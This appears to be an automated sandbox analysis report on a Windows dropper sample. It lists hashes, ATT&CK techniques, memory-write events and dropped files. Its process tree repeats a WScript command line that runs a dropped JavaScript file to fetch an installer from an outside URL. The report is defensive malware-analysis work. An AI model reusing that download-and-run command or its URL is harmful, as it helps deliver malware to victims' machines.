7cce13c40faccfe208b7e081b4a9cd721d64eacb7b9ad3b2d57b110523fb08fa

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
15-10-2024 02:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe
Size

184KB
MD5

4569cf9c0cf9bd31c85d02c1f0daf67e
SHA1

7c0a80635dc6453946fa53b228d27930af5fe16d
SHA256

7cce13c40faccfe208b7e081b4a9cd721d64eacb7b9ad3b2d57b110523fb08fa
SHA512

e7dd77b17cfeeea45e7adf1dcc3aaa74548a5428713ab4c721b7240181114598a9ddc561cd664deeab35a13652149e414b1d05ebdd6c3d2cddc9b93baf647e64
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3J:/7BSH8zUB+nGESaaRvoB7FJNndnc

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	1956	WScript.exe
8	1956	WScript.exe
10	1956	WScript.exe
12	2960	WScript.exe
13	2960	WScript.exe
15	1232	WScript.exe
16	1232	WScript.exe
18	1816	WScript.exe
19	1816	WScript.exe
29	528	WScript.exe
30	528	WScript.exe
32	528	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2540 wrote to memory of 1956	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	30
PID 2540 wrote to memory of 1956	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	30
PID 2540 wrote to memory of 1956	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	30
PID 2540 wrote to memory of 1956	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	30
PID 2540 wrote to memory of 2960	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	32
PID 2540 wrote to memory of 2960	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	32
PID 2540 wrote to memory of 2960	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	32
PID 2540 wrote to memory of 2960	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	32
PID 2540 wrote to memory of 1232	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	35
PID 2540 wrote to memory of 1232	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	35
PID 2540 wrote to memory of 1232	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	35
PID 2540 wrote to memory of 1232	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	35
PID 2540 wrote to memory of 1816	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	37
PID 2540 wrote to memory of 1816	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	37
PID 2540 wrote to memory of 1816	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	37
PID 2540 wrote to memory of 1816	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	37
PID 2540 wrote to memory of 528	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	39
PID 2540 wrote to memory of 528	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	39
PID 2540 wrote to memory of 528	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	39
PID 2540 wrote to memory of 528	2540	4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4569cf9c0cf9bd31c85d02c1f0daf67e_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7FCA.js" http://www.djapp.info/?domain=zuRLQmXIfJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7FCA.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1956
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7FCA.js" http://www.djapp.info/?domain=zuRLQmXIfJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7FCA.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2960
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7FCA.js" http://www.djapp.info/?domain=zuRLQmXIfJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7FCA.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1232
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7FCA.js" http://www.djapp.info/?domain=zuRLQmXIfJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7FCA.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1816
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7FCA.js" http://www.djapp.info/?domain=zuRLQmXIfJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7FCA.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
7e33ff7a8982efe5deaf81bb488c010e

SHA1
94b844549e53718e63ac9d9a553dc058dd03563a

SHA256
07e100c99ab46880f61e7943ea827559d8ef73ce8c19d8dec9a7a36f34856e4e

SHA512
9ccd773db10566c0bbafdf0841f90ee2bdb6f05785179cfaefc3c8e821c29e79f4411a92f8b9e610f67c82fb791cc449c1ef16cb07f6535b96a11ac0d3e53bed

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
be0b9bf9d130053d1cc20dec4fe14b35

SHA1
bbf82cda3752264025f26f5135a2d571d3fdeba0

SHA256
7d919b29dc0d72d83e1b3053d4894dda7920d3c0688508fe8ba71b3a470c377a

SHA512
4db101771cc9ab69877ea87dffa0baf457a0fe60688150d6baf3fff618263aaabcd938b3964cec239bf5148e8e821de9e48dc79c5df28497c6cd1c7954b81002

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
55f8846a686fe135c2dd4236466f9cfc

SHA1
9826cad239bc07d6db3a5f00b77de53fb9ab1a4c

SHA256
3cbda671cbeb8a1f347f586af722b001eedc86ae91bbec689a562bf1cf86ebab

SHA512
8ed172026772b84c92f43395d272d13f368a64ddf9939a3580a182ca13f35199c0adbcaba6eda016cfed1077743b849f87c4c267c1c52a6b3d5ebb79cfb17a46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
ab35e1d496bf05dabd4391d6d489af3e

SHA1
20997806a7de4c0923a1d22acbd26d7a07c7ffbd

SHA256
bd36e30bfc7f5e837b095662a856e21f36566d542da349aae1aa519125fe5c6a

SHA512
417bae1b2d31a54f0e426095d3f6d640e92e54f39e2ee3d24755a73fd3c0f5c98ababb055674ad2a83a17417613dd44696518976a5b1a0baca15eae568913a23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
5bb5d8d9e10436cb347f2790fbc98be0

SHA1
8879f086d97cfebc31b7fea7090fddabad3b3956

SHA256
c083cd9ec286fb2ed18be4fbd872f0deef1cc3164f27959aa6eefb9eb8a919b1

SHA512
5cbf6b3550467a94ae9fa92f438359a285fe88c717f3f58cbbdecdb8b89bf659574f60c44fe225b4c292ce769607d273038c9d5a38957a0e60200994f5fbce33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
40KB

MD5
b122a500446e53dd98df8b15a4f89593

SHA1
f919dafecdc138f1b075c2017630894b25575c69

SHA256
fe2eee7c02032d4caedc97a385a0727ecd2d266498ac0fdf2e01ffb18c5dec55

SHA512
b042d221c5259656d67d146d8cf002fec772bf1b7b8ba4a812b1ce3e1fe6b47e28a280a5e72b94bf69e8219f1f50fa088520c1ffffa3f7448b8b6f71dca5370c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
40KB

MD5
dab7af84ac1780a8229ee06e2f9e11e5

SHA1
0f255af9517794ae3a9efd4a4b75c7c187bde1ba

SHA256
36a015546081dd1e5ce975e92517c71da21538d387445842d578126f16f804ba

SHA512
e64821baf2883323dca7564269b1834ff5e4c0ac2652ffd92caa0d84a17bb9fb6f0ef41cd91dade5fe94730fce9a6132fc25014d2924caa0c8c83dc53f6d3b32

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC84E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarE004.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf7FCA.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\M22SKN1Z.txt

Filesize
177B

MD5
f81e256be077e8bb189908656aa19adb

SHA1
dc167bfb6572fac81c9b6f7ffae485b4170b58a0

SHA256
8fccc22cead403049ee45f8767c61557eb6a64a46b899c4f4a41d28805d60acb

SHA512
485b459567bf86c7a40469941b1abe64890dfdd1abfe14eb6c8882bf71b527399cd26a9934b3169b68311474823e14cf945ad74d9da2a37e8c634847b3f37560

Download Submit